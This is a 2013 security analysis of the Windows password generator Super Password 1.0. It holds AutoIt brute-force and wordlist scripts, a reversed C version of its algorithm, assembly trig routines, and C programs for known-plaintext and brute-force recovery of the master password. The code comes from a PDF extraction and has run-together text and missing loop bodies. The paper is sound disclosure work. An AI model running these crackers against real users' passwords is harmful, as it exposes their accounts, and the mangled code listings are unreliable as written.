Analysis of Super Password 1.0

Analysis of Super Password 1.0

Bart LeppensAnthony Piron

February 2013

1 What is Super Password

Super Password is a MS Windows application, written in 2000 by Yan QiQi, last updated September2nd, 2010. The application lives as an icon in the system tray bar. It tries to fix the problem that weneed to remember different passwords for every account we create. It takes an account name and amaster password as an input and then, when the ”generate” button is pushed, some magic happens.A unique password of 12 characters is generated. Everytime you provide this master password incombination with an account name, the application can regenerate the same password again andagain.

The helpfile of the application states: ”You needn’t worry about the security. The COA algorithmSuper Password uses to generate account passwords is very very complex and strong. No one canbreak it.” Let’s see if that’s true.

2 Blackbox Analysis

2.1 Blackbox characteristics

Super Password has some weird behavior and some strange characteristics. The resulting password isnot affected by:

• providing the master password in uppercase or in lowercase.

• providing the account name in uppercase or in lowercase.

• adding special characters (like e,@, c, ... ) to the master password.

• adding special characters to the provided account.. . .

The range of allowed characters is thus limited to a-z0-9. The resulting password always exists of12 characters which are limited by this same range: a-z0-9. Theoretically, the super password must

1

consist of at least 4 characters and the account name must consist of at least 3 characters. Thislimitation only counts for the GUI, since if there are all special characters, this statement is wrongand there can even be no master password at all (e.g. @&|$). There doesn’t seem to be a limit tothe maximum length. But the more characters provided, the longer it seems to take to calculate thepassword.

2.2 Blackbox attacking

Suppose we have the credentials of one of the accounts (accountname and corresponding password).Then we can try to bruteforce the master password or we can use a wordlist and test if the masterpassword is on the list. One way of doing this is with a scripting language called AutoIt. The followingscripts are written for AutoIt v3.

WinWaitActive (” Super Password 1 . 0 ” )

;We search the master password which g i v e s ” b3daeu6z l c l4 ”; f o r account name ”myaccount”$capturedpassword = ” b3daeu6z l c l4 ”$accountname = ”myaccount”

ControlSetText (” Super Password 1 . 0” , ”” ,” [CLASS: TEdit ; INSTANCE: 3 ] ” , ”myaccount ”)

Local $ f i l e = FileOpen (” w o r d l i s t . l s t ” ,0 )I f $ f i l e = −1 Then

MsgBox(0 , ” Error ” , ”Unable to open f i l e ”)Exit

EndIf

While 1Local $ l i n e = FileReadLine ( $ f i l e )I f @error = −1 Then ExitLoopControlSetText (” Super Password 1 . 0” , ”” ,

” [CLASS: TEdit ; INSTANCE: 4 ] ” , $ l i n e )Contro lC l i ck (” Super Password 1 . 0” , ”” ,

” [CLASS: TButton ; INSTANCE: 1 ] ” )$a = ControlGetText ( ”Super Password 1 . 0” , ”” ,

” [CLASS: TEdit ; INSTANCE: 2 ] ” )I f $a == $capturedpassword Then

While ( True )MsgBox(0 , ”” , $ l i n e , 1)s l e e p (1000)

WEndExit

EndIfWEnd

This way we were able to test +-4000 of passwords per minute on a AMD Turion 64 X2 Mobile1.8GHz system. When performing a brute force attack on the master password we can use thefollowing algorithm:

WinWaitActive (” Super Password 1 . 0 ” )

;We search the master password which g i v e s ”5 x l 2 s d c 0 i d f 9 ”; f o r account name ”myaccount”$capturedpassword = ”5 x l 2 s d c 0 i d f 9 ”

2

$accountname = ”myaccount”ControlSetText (” Super Password 1 . 0” , ”” ,

” [CLASS: TEdit ; INSTANCE: 3 ] ” , $accountname )

$St r ing = ”a , b , c , d , e , f , g , h , i , j , k , l ,m, n , o , p , q , r , s , t , u , v ,w, x , y , z”& ” ,0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9”

$St r ing = S t r i n g S p l i t ( $Str ing , ” ,” )For $ i = 1 To $St r ing [ 0 ] Step +1

For $ i1 = 1 To $St r ing [ 0 ] Step +1For $ i2 = 1 To $St r ing [ 0 ] Step +1

For $ i3 = 1 To $St r ing [ 0 ] Step +1$1 = $Str ing [ $ i ] & $St r ing [ $ i 1 ] & $Str ing [ $ i 2 ] & $St r ing [ $ i 3 ]ControlSetText (” Super Password 1 . 0” , ”” ,

” [CLASS: TEdit ; INSTANCE: 4 ] ” , $1 )Contro lC l i ck (” Super Password 1 . 0” , ”” ,

” [CLASS: TButton ; INSTANCE: 1 ] ” )$a = ControlGetText ( ”Super Password 1 . 0” , ”” ,

” [CLASS: TEdit ; INSTANCE: 2 ] ” )I f $a == $capturedpassword Then

While ( True )MsgBox(0 , ”” , $1 , 1)s l e e p (1000)

WEndExit

EndIfNext

NextNext

Next

With only 4000 keys a minute breaking a only 4 character password would take us almost 7 hours:( 364

4000∗60).

3 Whitebox Analysis

3.1 Modifying the original binary

When looking at the application with a debugger, we can see that there are some interesting addresses:

• 0x004022AA: calls the start of password generation which is located at 0x0040179C

• 0x00402474 → 0x0040264B: the applications help function

3

It is clear that we can easily replace the applications help function with our own assembly, we have471 bytes of space. So basically, we can add our own custom brute force code and start the attackwith a push on the help button. We are not sharing this code here, since we retook a part of theoriginal super password assembly and this might infringe copyright violations. It takes now about 2minutes to brute force a 4 character super password on a AMD Turion 64 X2 Mobile 1.8GHz system.That are 14000 keys a second. Multiple binaries can be generated which contain part of the workload.So, if multiple processes can be started which can speed up e.g. on a 12 core system, it will only takeseconds to test the same 4 character sequence. But the time needed to brute force is multiplied by 36everytime you add an additional character to super password.

3.2 Reversing the algorithm

3.2.1 The algorithm in C

When looking at super passwords address 0x0040179C and following the assembly further down, wecan deduce the algorithm. First there is the conversion from uppercase to lowercase. We can see thatspecial characters are simply skipped. The algorithm first takes every character of the provided superpassword in account and then it proceeds with every character of the provided account name. Thenthe algorithm does a modulo 36 of the result, which is then translated back into an ascii character ofrange a-z0-9. This translation is in fact a simple transition. For every of the 12 resulting charctersthis sequence is repeated, but every time the index of the resulting character is taken into account inthe calculations. Provided with only valid characters (a-z0-9), we can translate the algorithm to thisC99 implementation:

#inc lude <s t d i o . h>#inc lude <s t d i n t . h>

double bor l ands in ( double ang le ) ;double bor landcos ( double ang le ) ;

4

i n t Ca l cu l a t eLe t t e r ( char ∗ the superpwd , char ∗ the username , i n t the index ){u i n t 3 2 t r e s u l t = 0 ;double d = 0 . 0 ;

// f o r each charac t e r o f the master passwordf o r ( char ∗ptr = the superpwd ; ∗ptr ; ptr++) {

char a = ∗ptr ;// mult ip ly the a s c i i code o f the charac t e r with 654321//and add to the r e s u l tr e s u l t += ( u i n t 3 2 t ) a ∗ 654321;// c a l c u l a t e a cons ine o f the r e s u l t and mult ip ly with//( the index o f the r e s u l t i n g charac t e r ∗ 123456 + 987654321)d = bor landcos ( r e s u l t ) ∗ ( the index ∗ 123456 + 987654321) ;// ca s t back to 32−b i t unsigned i n t e g e r va lue// t h i s i s the new value f o r r e s u l tr e s u l t = ( u i n t 3 2 t ) d ;

}

// f o r each charac t e r o f the usernamef o r ( char ∗ptr = the username ; ∗ptr ; ptr++) {

char a = ∗ptr ;// mult ip ly the the a s c i i code o f the charac t e r with 123456//and add to the r e s u l tr e s u l t += ( u i n t 3 2 t ) a ∗ 123456;// c a l c u l a t e a s i n e o f the r e s u l t and mult ip ly with//( the index o f the r e s u l t i n g charac t e r ∗ 654321 + 123456789)d = bor lands in ( r e s u l t ) ∗ ( the index ∗ 654321 + 123456789) ;// ca s t back to 32−b i t unsigned i n t e g e r va lue// t h i s i s the new value f o r r e s u l tr e s u l t = ( u i n t 3 2 t ) d ;

}

i n t r e s cha r = r e s u l t % 36 ; // r e s u l t modulo 36i f ( r e s cha r < 10) {

r e s cha r += 48 ; // convert back to a s c i i cha rac t e r 0 . . 9} e l s e {

r e s cha r += 87 ; // convert back to a s c i i cha rac t e r a . . z}re turn r e s cha r ; // a s c i i cha rac t e r in range o f 0−9a−z

}

i n t main ( ){char superpwd [ ] = ” yanq iq i ” ; // the master passwordchar username [ ] = ” yanq iq i ” ; // the usernamei n t l e t t e r = 0 ;

// generate and p r in t a l l 12 c h a r a c t e r s f o r the corre spond ing passwordf o r ( i n t i =0; i <12; i ++){

l e t t e r = Ca l cu l a t eLe t t e r ( superpwd , username , i ) ;p r i n t f (”%c ” , l e t t e r ) ;

}p r i n t f (”\n ” ) ;r e turn 0 ;

5

}

3.2.2 Reflections on the algorithm

The algorithm calculates the resulting 12 characters one at a time. So when the first calculatedcharacter does not correspond with the desired result, we can already proceed to the next candidate(in both cases of brute forcing and dictionary attack). The first part, that processes the providedsuper password can be precalculated for all 12 the characters (=indexes). The second part that usesthe username, we can calculate for each of the 12 characters (=indexes) all possible constants, thatgives us the resulting letter. The algorithm uses 32-bit unsigned integers in its calculation. Theseintegers are multiplied by sines and cosines. Super password was compiled with Borland Delphi 4.1.Delphi makes use of x87 FPU for the calculations of these sines and cosines. But the instructions fsinand fcos are not used to generate the sines and cosines. The returned value is specific for the Borlandimplementation, it contains a certain imprecision. Since the resulting sines and cosines are mulitpliedwith large uint32 t values (unsigned dwords), the result cannot be simulated using a library like< math.h >. Assume a cosine of 4242011732 that gives a value of 0.3186359445366380254 in Delphiand a value of 0.3186359446060212374 with < math.h > and with the fcos instruction. When youmultiply for example 987777777 with these values, the values after casting back to uint32 t differ.The casting of 314741504,966 results in 314741504 (Delphi) but the casting of 314741505,0352 resultsin 314741505 (fcos). Augmenting the accurracy does not help us here, super password relies on theBorland implementation of cosine and sine. This makes that the algorithm is not portable.

3.2.3 The Borland sine and cosine with Nasm

We have written a small Delphi program and extracted the assembly. We used the addresses of ”superpassword” as labels to help matching with the original executable binary.

s e c t i o n . data; PI d iv ided by 4piBy4 : DB 0x35 , 0 xC2 , 0 x68 , 0 x21 , 0 xA2 , 0xDA, 0 x0F , 0 xC9 , 0 xfe , 0 x3f , 0x35 , 0xC2nan : DD 0x0FFC04200

s e c t i o n . t ex tg l o b a l b o r l a n d s i ng l o b a l bor l andcos

b o r l a n d s i n :PUSH EBPMOV EBP,ESPFINITFLD QWORD [EBP+8]MOV CL, 0JMP spw00434516

bor l andcos :PUSH EBPMOV EBP,ESPFINITFLD QWORD [EBP+8]MOV CL, 2

spw00434516 :FXAMSUB ESP, 4WAITFSTSW WORD [ESP]WAIT

6

MOV AH,BYTE [ESP+1]SAHFJC spw00434534JNZ spw00434553JMP spw0043454E

spw00434534 :JZ spw00434542JNP spw00434542FSTP ST0FLD DWORD[ nan ]FTST

spw00434542 :JMP spw0043454E

spw00434544 :FCOMPPFLD DWORD[ nan ]FTST

spw0043454E :JMP spw004345EA

spw00434553 :FABSFLD TWORD[ piBy4 ]FXAMFXCHFPREMMOV CH, 2AND CH, AHSHR CH, 1FSTSW WORD[ESP]WAITMOV AH, BYTE[ESP+1]SAHFJP spw00434544MOV AL, 3AND AL, AHSHL AH, 1SHL AH, 1RCL AL, 1ADD AL, 0FChRCL AL, 1CMP CL, 2JNE spw0043458AADD AL, CLMOV CH, 0

spw0043458A :AND AL, 7TEST AL, 1JZ spw00434594FSUBJMP spw00434596

spw00434594 :FSTP ST1

spw00434596 :

7

FPTANTEST AL, 3JPE spw004345A3FXCH

spw004345A3 :FLD ST1FMUL ST0 , ST0FXCHFMUL ST0 , ST0FADDFSQRTSHR AL, 1SHR AL, 1XOR AL, CHJZ spw004345B9FCHS

spw004345B9 :FDIVJMP spw004345EA

spw004345EA :ADD ESP, 4LEAVERETN

Built with NASM version 2.10.06 on Windows XP:

nasm −f win32 bor l ands inco s . nasm −o bo r l ands in co s . obj

And then compiled the c code and linked with gcc version 3.4.5 on Windows XP (MinGW)

gcc spw . c bo r l ands in co s . obj −std=c99 −o spw . exe

An alternative method that can be used are lookup tables. In double precision, each sine or cosinetakes up exactly 8 bytes. So 32 GB (=232 ∗ 8 bytes) for all possible sines and another 32 GB for allposible cosines. In this way no FPU-calculations are needed.

3.3 Attack on the reversed alogithm

3.3.1 Known-plaintext attack with multiple samples

When the attacker has +-6 combinations of account names and the corresponding password, we cancreate some constants for each index that will replace the master password. Consider the following mas-ter password ”zfghijklooz57o8zzzvbfaaqdiu6875433” and the corresponding pairs of generated account-name and password (”azerty”,”bqzlxi4hwwrl”), (”abc”,”0rrlo5tglzvg”), (”mail”,”9m0u7ua78k3q”),(”webshop”,”odtp5udarw66”), (”yanqiqi”,”y3te20uwsl2u”), (”intranet”,”8wb4dyrwh2h8”). We cancalculate the constants for each index with the folling C99 implementation:

#inc lude <s t d i o . h>#inc lude <s t d i n t . h>

double bor l ands in ( double ang le ) ;

u i n t 6 4 t h i t = 0 , miss = 0 ;

// c r e a t e caching f o r s i n e c a l c u l a t i o n#d e f i n e SIN SIZE (1 << 26)s t r u c t {

u i n t 3 2 t x ;

8

double s i n ;} hs in [ SIN SIZE ] ;

s t a t i c i n l i n edoublemysin ( u i n t 3 2 t x ){

u i n t 3 2 t h = x % SIN SIZE ;

i f ( hs in [ h ] . x == x ) // v e r i f y i f s i n e in cache i s s i n e f o r va lue xreturn hs in [ h ] . s i n ;

// e l s e c a l c u l a t e s i n e f o r va lue x and p lace in cachehs in [ h ] . x = x ;hs in [ h ] . s i n = bor l ands in ( x ) ;

r e turn hs in [ h ] . s i n ;}

s t a t i c i n l i n e i n tCa l cu l a t eLe t t e r ( u i n t 3 2 t cst , char ∗ the username , i n t the index ){

u i n t 3 2 t r e s u l t = c s t ;double d = 0 . 0 ;


char a = ∗ptr ;// mult ip ly the the a s c i i code o f the charac t e r with 123456//and add to the r e s u l tr e s u l t += ( u i n t 3 2 t ) a ∗ 123456;// c a l c u l a t e a s i n e o f the r e s u l t and mult ip ly with//( the index o f the r e s u l t i n g charac t e r ∗ 654321 + 123456789)d = mysin ( r e s u l t ) ∗ ( the index ∗ 654321 + 123456789) ;// ca s t back to 32−b i t unsigned i n t e g e r va lue// t h i s i s the new value f o r r e s u l tr e s u l t = ( u i n t 3 2 t ) d ;

}




}

u i n t 3 2 tsearchCst ( char ∗ c l t l o g [ ] , char ∗ c lt pwd [ ] ,

u i n t 3 2 t from , u i n t 3 2 t to , i n t index ){

u i n t 3 2 t i = from ;

9

whi le (1 ) {char ∗∗ pl = c l t l o g ;char ∗∗pd = clt pwd ;i n t found = 1 ;

f o r ( ; ∗ pl ; p l++, pd++) {i n t l e t t e r = Ca l cu l a t eLe t t e r ( i , ∗pl , index ) ;// i f f o r one o f the provided usernamse the c a l c u l a t e d charac t e r// does not correspond with the provided charac t e r o f the password//we can break and proceed with v e r i f y i n g next constant candidatei f ( (∗pd ) [ index ] != l e t t e r ){ found = 0 ; break ; }

}

i f ( found ) {p r i n t f (” Res : %u\n” , i ) ; // candidate constant f o r ” index ” found

}

i f ( i % 0xFFFFFFFul == 0) // d i s p l a y some prog r e s sp r i n t f (” I : %08x\n” , i ) ;

i f ( i++ == to ) // increment i t i l l maximum value (=to )break ;

}re turn 0 ;

}

/∗(” aze r ty ” ,” bqzlx i4hwwrl ”) ,(” abc ” ,”0 r r l o 5 t g l z v g ”) ,(” mail ” ,”9 m0u7ua78k3q ”) ,(” webshop ” ,” odtp5udarw66 ”) ,(” yanq iq i ” ,” y3te20uwsl2u ”) ,(” i n t r a n e t ” ,”8 wb4dyrwh2h8 ”)∗/

i n t main ( ) {// l i s t with a l l known l o g i n s//and a l i s t with a l l cor re spond ing passwordschar ∗ c l t l o g [ ] = {” aze r ty ” , ”abc ” , ” mail ” ,

”webshop ” , ” yanq iq i ” , ” i n t r a n e t ” , NULL} ;char ∗ c lt pwd [ ] = {” bqzlxi4hwwrl ” , ”0 r r l o 5 t g l z v g ” , ”9m0u7ua78k3q ” ,

”odtp5udarw66 ” , ” y3te20uwsl2u ” , ”8wb4dyrwh2h8 ” , NULL} ;

// c l e a r the cachef o r ( u i n t 3 2 t i = 0 ; i < SIN SIZE ; i++){

hs in [ i ] . x = 0 ;hs in [ i ] . s i n = 0 ;

}

// parameter1 : l i s t o f known l o g i n s

10

// parameter2 : l i s t o f cor re spond ing passwords// parameter3 : s t a r t o f range in which to search cons tant s// parameter4 : end o f range in which to search cons tant s// parameter5 : s earch cons tant s f o r index ( 0 . . 1 1 )searchCst ( c l t l o g , clt pwd , 0 x0ul , 0xFFFFFFFFul , 1 0 ) ;

r e turn 0 ;}

For each index that gives us following constants:

• index0: 155016602, 573820617, 985378604, 2704508381, 3123312396, 3534870383

• index1: 1047828493, 3597320272

• index2: 1100035586, 3649527365

• index3: 1553765556, 4053351770, 4103257335

• index4: 289936959, 701494946, 1113052933, 1524610920, 2839428738, 3250986725, 3662544712,4074102699

• index5: 851594859, 1263152846, 1674710833, 2086268820

• index6: 833806284, 1245364271, 1710109732, 3383298063, 3794856050, 4259601511

• index7: 28064626, 774212545, 1157763239, 1185770532, 1754440431, 2165998418, 2577556405,3323704324, 3735262311

• index8: 757253385, 1168811372, 2973540570, 3306745164, 3718303151

• index9: 856489889, 3405981668

• index10: 557930578, 969488565, 3107422357, 3518980344

• index11: 184071555, 595629542, 880689466, 1292247453, 1703805440, 1910447360, 2322005347,2733563334, 3145121321, 3430181245, 3841739232, 4253297219

For accountname ”administrator” that results in the following characters:

• index0: g, t, t, g, t, t

• index1: 4, 4

• index2: w, w

• index3: g, 5, g

• index4: o, o, o, o, o, o, o, o

• index5: x, x, x, x

• index6: w, w, g, w, w, g

• index7: u, h, j, h, u, u, u, h, h

• index8: 9, 9, 1, 9, 9

• index9: n, n

• index10: y, y, y, y

• index11: n, n, l, l, l, n, n, n, n, l, l, l

11

The space in which we need to search the password is heavily reduced. For username ”administrator”,the list of possible passwords using provided indexes is limited to only 96 possible passwords:

g4wgoxwu9nyn , g4wgoxwu9nyl , g4wgoxwu1nyn , g4wgoxwu1nyl , g4wgoxwh9nyn ,g4wgoxwh9nyl , g4wgoxwh1nyn , g4wgoxwh1nyl , g4wgoxwj9nyn , g4wgoxwj9nyl ,g4wgoxwj1nyn , g4wgoxwj1nyl , g4wgoxgu9nyn , g4wgoxgu9nyl , g4wgoxgu1nyn ,g4wgoxgu1nyl , g4wgoxgh9nyn , g4wgoxgh9nyl , g4wgoxgh1nyn , g4wgoxgh1nyl ,g4wgoxgj9nyn , g4wgoxgj9nyl , g4wgoxgj1nyn , g4wgoxgj1nyl , g4w5oxwu9nyn ,g4w5oxwu9nyl , g4w5oxwu1nyn , g4w5oxwu1nyl , g4w5oxwh9nyn , g4w5oxwh9nyl ,g4w5oxwh1nyn , g4w5oxwh1nyl , g4w5oxwj9nyn , g4w5oxwj9nyl , g4w5oxwj1nyn ,g4w5oxwj1nyl , g4w5oxgu9nyn , g4w5oxgu9nyl , g4w5oxgu1nyn , g4w5oxgu1nyl ,g4w5oxgh9nyn , g4w5oxgh9nyl , g4w5oxgh1nyn , g4w5oxgh1nyl , g4w5oxgj9nyn ,g4w5oxgj9nyl , g4w5oxgj1nyn , g4w5oxgj1nyl , t4wgoxwu9nyn , t4wgoxwu9nyl ,t4wgoxwu1nyn , t4wgoxwu1nyl , t4wgoxwh9nyn , t4wgoxwh9nyl , t4wgoxwh1nyn ,t4wgoxwh1nyl , t4wgoxwj9nyn , t4wgoxwj9nyl , t4wgoxwj1nyn , t4wgoxwj1nyl ,t4wgoxgu9nyn , t4wgoxgu9nyl , t4wgoxgu1nyn , t4wgoxgu1nyl , t4wgoxgh9nyn ,t4wgoxgh9nyl , t4wgoxgh1nyn , t4wgoxgh1nyl , t4wgoxgj9nyn , t4wgoxgj9nyl ,t4wgoxgj1nyn , t4wgoxgj1nyl , t4w5oxwu9nyn , t4w5oxwu9nyl , t4w5oxwu1nyn ,t4w5oxwu1nyl , t4w5oxwh9nyn , t4w5oxwh9nyl , t4w5oxwh1nyn , t4w5oxwh1nyl ,t4w5oxwj9nyn , t4w5oxwj9nyl , t4w5oxwj1nyn , t4w5oxwj1nyl , t4w5oxgu9nyn ,t4w5oxgu9nyl , t4w5oxgu1nyn , t4w5oxgu1nyl , t4w5oxgh9nyn , t4w5oxgh9nyl ,t4w5oxgh1nyn , t4w5oxgh1nyl , t4w5oxgj9nyn , t4w5oxgj9nyl , t4w5oxgj1nyn ,t4w5oxgj1nyl

The more combinations of usernames/passwords are given, the less possible constants are found andso, the more the list of possible master passwords will be reduced.

3.3.2 Brute force attack of the master password

Now that we have seen the algorithm of super password, we are not sure that there won’t be anycollisions. So we can search for a ”candidate” master password. Assume the following C99 implemen-tation:

#inc lude <s t d i o . h>#inc lude <s t d i n t . h>#inc lude <time . h>

double bor l ands in ( double ang le ) ;double bor landcos ( double ang le ) ;

// c r e a t e caching f o r s i n e c a l c u l a t i o n#d e f i n e SIN SIZE (1 << 23)s t r u c t {

u i n t 3 2 t x ;double s i n ;

} hs in [ SIN SIZE ] ;

s t a t i c i n l i n edoublemysin ( u i n t 3 2 t x ){

u i n t 3 2 t h = x % SIN SIZE ;

i f ( hs in [ h ] . x == x ) // v e r i f y i f s i n e in cache i s s i n e f o r va lue xreturn hs in [ h ] . s i n ;

12

// e l s e c a l c u l a t e s i n e f o r va lue x and p lace in cachehs in [ h ] . x = x ;hs in [ h ] . s i n = bor l ands in ( x ) ;

r e turn hs in [ h ] . s i n ;}

// c r e a t e caching f o r c o s i n e c a l c u l a t i o n#d e f i n e COS SIZE (1 << 23)s t r u c t {

u i n t 3 2 t x ;double cos ;

} hcos [ COS SIZE ] ;

s t a t i c i n l i n edoublemycos ( u i n t 3 2 t x ){

u i n t 3 2 t h = x % COS SIZE ;

i f ( hcos [ h ] . x == x ) // v e r i f y i f c o s i n e in cache i s c o s i n e f o r va lue xreturn hcos [ h ] . cos ;

// e l s e c a l c u l a t e s i n e f o r va lue x and p lace in cachehcos [ h ] . x = x ;hcos [ h ] . cos = bor landcos ( x ) ;

r e turn hcos [ h ] . cos ;}

s t a t i c i n l i n e i n tCa l cu l a t eLe t t e r ( char ∗ the superpassword , char ∗ the username , i n t the index ){

u i n t 3 2 t r e s u l t = 0 ;double d = 0 . 0 ;

// f o r each charac t e r o f the master passwordf o r ( char ∗ptr = the superpassword ; ∗ptr ; ptr++) {

char a = ∗ptr ;// mult ip ly the a s c i i code o f the charac t e r with 654321//and add to the r e s u l tr e s u l t += ( u i n t 3 2 t ) a ∗ 654321;// c a l c u l a t e a cons ine o f the r e s u l t and mult ip ly with//( the index o f the r e s u l t i n g charac t e r ∗ 123456 + 987654321)d = mycos ( r e s u l t ) ∗ ( the index ∗ 123456 + 987654321) ;// ca s t back to 32−b i t unsigned i n t e g e r va lue

// t h i s i s the new value f o r r e s u l tr e s u l t = ( u i n t 3 2 t ) d ;

}


char a = ∗ptr ;// mult ip ly the the a s c i i code o f the charac t e r with 123456

13

//and add to the r e s u l tr e s u l t += ( u i n t 3 2 t ) a ∗ 123456;// c a l c u l a t e a s i n e o f the r e s u l t and mult ip ly with//( the index o f the r e s u l t i n g charac t e r ∗ 654321 + 123456789)d = mysin ( r e s u l t ) ∗ ( the index ∗ 654321 + 123456789) ;// ca s t back to 32−b i t unsigned i n t e g e r va lue// t h i s i s the new value f o r r e s u l tr e s u l t = ( u i n t 3 2 t ) d ;

}




}

i n t main ( ) {char ∗ c l t l o g = ” admin i s t ra to r ” ;char ∗ c lt pwd = ”t4w5oxwh9nyl ” ;

// c l e a r the cachef o r ( u i n t 3 2 t i = 0 ; i < SIN SIZE ; i++){

hs in [ i ] . x = 0 ;hs in [ i ] . s i n = 0 ;

}

f o r ( u i n t 3 2 t i = 0 ; i < COS SIZE ; i++){

hcos [ i ] . x = 0 ;hcos [ i ] . cos = 0 ;

}

#d e f i n e MAX DEPTH 4 // depth o f password to search f o rchar spw [MAX DEPTH+2] ;f o r ( i n t i= 0 ; i<MAX DEPTH+2; i ++){

spw [ i ] = 0 ;}

i n t depth = 0 ;i n t cha r r e s = 0 ;

double e l apsed ; // in m i l l i s e c o n d sc l o c k t s ta r t , end ;s t a r t = c lo ck ( ) ;

//some s imple brute f o r c e a lgor i thmwhi le ( depth < MAX DEPTH+1){

depth = 0 ;

14

whi le ( spw [ depth ] == 122) depth++;i f ( spw [ depth ]==57){

spw [ depth ] = 97 ;}e l s e i f ( spw [ depth ]<48){

spw [ depth ] = 48 ;}e l s e {

spw [ depth ]++;}i n t h = depth ;

whi l e (h>0){spw [ h−1] = 48 ;h−−;

}

i f ( depth > 4){ //show some prog r e s sf o r ( char ∗ptr = spw ; ∗ptr ; ptr++){

char a = ∗ptr ;p r i n t f (”%c ” , a ) ;

}p r i n t f (”\n ” ) ;

}

f o r ( i n t i =0; i< 12 ; i ++){cha r r e s = Ca l cu l a t eLe t t e r ( spw , c l t l o g , i ) ;// sk ip to next i f not expected r e s u l ti f ( cha r r e s != clt pwd [ i ] ) break ;i f ( i == 11){

p r i n t f (” found\n ” ) ;f o r ( char ∗ptr = spw ; ∗ptr ; ptr++){

char a = ∗ptr ;p r i n t f (”%c ” , a ) ;

}p r i n t f (”\n ” ) ;

}}depth++;

}

end = c lock ( ) ;e l apsed = ( ( double ) ( end − s t a r t ) ) / CLOCKS PER SEC;p r i n t f (” time : %f seconds \n” , e l apsed ) ;

r e turn 0 ;}

Some of the calculated sines and cosines are cached in memory. It now takes about 15 seconds tobrute force a 4 character super password on a AMD Turion 64 X2 Mobile 1.8GHz system using onlyone thread. That are more then 110.000 keys per second.

15

3.3.3 Optimisations of brute force attack

Multiple optimisations are possible. For each index, all possible constants can be precalculated, whichwould avoid calculations with the account name when performing brute force or dictionary attacks(this can replace the second part of the COA algorithm). For each master password we want to test,we can (pre-)generate the constant for each of the 12 indexes. Then we can check if these constantscorrespond with the possible precalculated constants. If they correspond with all 12 indexes, wehave a candidate for the original super password. The calculation of these constants for each masterpassword could be distributed. Lookup tables which contains the constants for master passwordscould be shared.

4 Conclusion

The COA algorithm is at least vunerable to known plain text attack. Super password can be easilyattacked with dictionaries either. Brute forcing is also a problem for super password since for eachplaintext master password, the corresponding constants can be precalculated and this for each ofthe 12 indexes. When distibuting the effort, lookup tables for very long master passwords could begenerated and thus super password is never a safe option. We heavily recommend not to use this pieceof software anymore.

5 References

• http://www.softpedia.com/get/Security/Password-Managers-Generators/Super-Password.shtml

• http://www.nasm.us/

• http://www.ollydbg.de/

16

Documents

Analysis of Super Password 1.0